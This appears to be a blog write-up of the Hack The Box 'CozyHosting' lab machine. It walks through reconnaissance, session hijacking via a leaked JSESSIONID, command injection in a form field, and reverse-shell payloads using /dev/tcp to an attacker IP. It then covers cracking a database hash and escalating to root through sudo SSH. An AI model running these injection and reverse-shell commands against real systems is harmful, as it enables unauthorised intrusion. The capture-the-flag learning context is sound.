Machine Name: CozyHosting
Difficulty level: Easy
CozyHosting is a cybersecurity challenge where you explore a computer system, like a video game. It’s a safe way to learn about hacking and fixing security issues. Your mission is to find and solve problems to become a cybersecurity pro while having fun in this controlled environment.
Join us in conquering the ‘CozyHosting’ machine (IP: 10.10.11.230) on Hack The Box. This beginner-friendly challenge offers a collaborative learning experience where we discuss tools and techniques in a friendly manner. Come be a part of this exciting journey, combining fun and knowledge!
Nmap
As a first step, we’ll start by checking the target IP using Nmap. We’ll use the command ‘sudo nmap -sVC [target IP]’ to find out which doors are open and what services are running on the target machine. It’s like peering through the door to see what’s inside.
We have identified four open ports on the target machine: SSH (port 22), HTTP (port 80), port 4567, and port 8000. We’ll begin our exploration by focusing on port 80, which typically hosts web services. This is a common starting point for further investigation.
Now time to find hidden directory so the command we will use is this “dirsearch -u http://cozyhosting.htb/” 👀👇.
Ok now I have already try the“/admin” directory but it's throwing me on login page. Then try to Access “/actuator/sessions” and guess what I got user name “kanderson” But I am confused what “ABB0527C3FF2088EACD54106EB67A5B5" then I try to enter in /admin directory and capture that request in my burp.
So we can see that it is JSessionID so now we will Change JSessionID with “kanderson” JSessionID with “/admin” directory and try to Access.
I scroll down and I saw it was asking for hostname and username so I enter the hostname & username that we got upwards 👆.
I got DENY so I remove the username and guess what I got DENY but you can 👀the Response is changed you can compare both the image 👀👆👇.
So I try here “;$whoami$ ”
So now time to use netcat to get connection I do 👀👇. {;`(bash)0>/dev/tcp/10.10.16.16/1234`} I use this payload for connection and boom you can see I am connected. But “bash -i >& /dev/tcp/10.0.0.1/4242 0>&1” this is the payload I don't use 0>&1.
So I try with this command “exec >&0”
The command exec >&0 is used to redirect the standard output (stdout) of a shell back to the standard input (stdin). This effectively means that any output produced by commands executed in the shell will be sent to the same location where input from the keyboard is expected.
Here’s a breakdown of what this command does:
exec: This is a built-in shell command used to modify the behavior of the current shell.>: This symbol is used for output redirection.&0: This represents file descriptor 0, which corresponds to standard input (stdin).
Then I use this “script /dev/null -c bash”
The command you’ve provided, script /dev/null -c bash, is used to create a script session that logs the input and output of a shell session. Here's how it works:
script: This is the command to start a new script session./dev/null: It specifies that the script should write its output to the null device, effectively discarding the output. This is often used to prevent the script from creating a log file.-c bash: This part specifies the command that you want to run within the script session. In this case, it's launching a new Bash shell.
I have successfully obtained the “kanderson” shell. Now, our objective is to retrieve the user flag; however, there is another username, “josh,” for which I lack the necessary permissions to access. Nevertheless, we have located a file named “cloudhosting-0.0.1.jar.” To proceed, we intend to transfer this file to our primary system using a Python server. 👀👇
We have successfully accessed the .jar file through the online tool at https://jdec.app/. Remarkably, we have acquired both the username and password credentials, and it has come to our attention that this machine is utilizing a PostgreSQL database.
Now we need to enter in cozyhosting using this command “\c cozyhosting” then we use this command “\d” for all tables.
So now we use this command {select * from users ;}.
Now, we will use the ‘John the Ripper’ tool to crack the hash of ‘admin.’ First, we need to save the hash in a file. Could you please guide me on how to create a file through the command line?.
Now that we have successfully cracked the hash, and the password is ‘manchesterunited’ it’s time to establish an SSH connection with the command ‘‘ssh josh@10.10.11.230’’.
Let’s proceed to obtain the root flag. First we will check the permission.
I’ve noticed that SSH has root permissions, so I’m going to use this payload 👀👇.
Boom 💥 🤯, we’ve successfully obtained the root flag!
If you have found the information valuable, I encourage your interest and engagement! Should you have any further questions or require additional assistance, please don’t hesitate to reach out to me through my Twitter account: https://twitter.com/AshishRaosahab6 or connect with me on LinkedIn: https://www.linkedin.com/in/ashish-yadav-120051267/. I am more than willing to offer any necessary support or provide clarification.
